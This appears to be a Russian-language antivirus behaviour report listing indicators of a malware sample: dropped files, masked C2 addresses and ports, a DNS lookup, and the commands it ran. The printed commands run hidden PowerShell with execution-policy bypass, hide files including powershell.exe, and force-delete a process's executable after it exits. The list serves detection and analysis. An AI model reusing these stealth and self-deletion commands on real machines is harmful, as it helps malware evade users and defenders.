Техническая информация
- <SYSTEM32>\windowspowershell\v1.0\cuhmp.exe
- %TEMP%\qzohk.txt
- %TEMP%\qzohk.txt
- '89.##5.85.102':58001
- '89.##5.85.102':58002
- '89.##5.85.102':58003
- '15#.#01.65.91':443
- DNS ASK su##.#4kdeliver.top
- '<SYSTEM32>\cmd.exe' "/C powershell.exe -noprofile -w hidden -ep bypass -command [System.IO.File]::SetAttributes('<SYSTEM32>\WindowsPowerShell\v1.0\cuHmp.exe', [System.IO.FileAttributes]::Hidden); $gingerbread_PK0W... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noprofile -w hidden -ep bypass -command [System.IO.File]::SetAttributes('<SYSTEM32>\WindowsPowerShell\v1.0\cuHmp.exe', [System.IO.FileAttributes]::Hidden); $gingerbread_PK0W1R334M = [System.IO...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [System.Diagnostics.Process]::GetProcessById(5436);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C ATTRIB +H "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" & exit (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +H "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"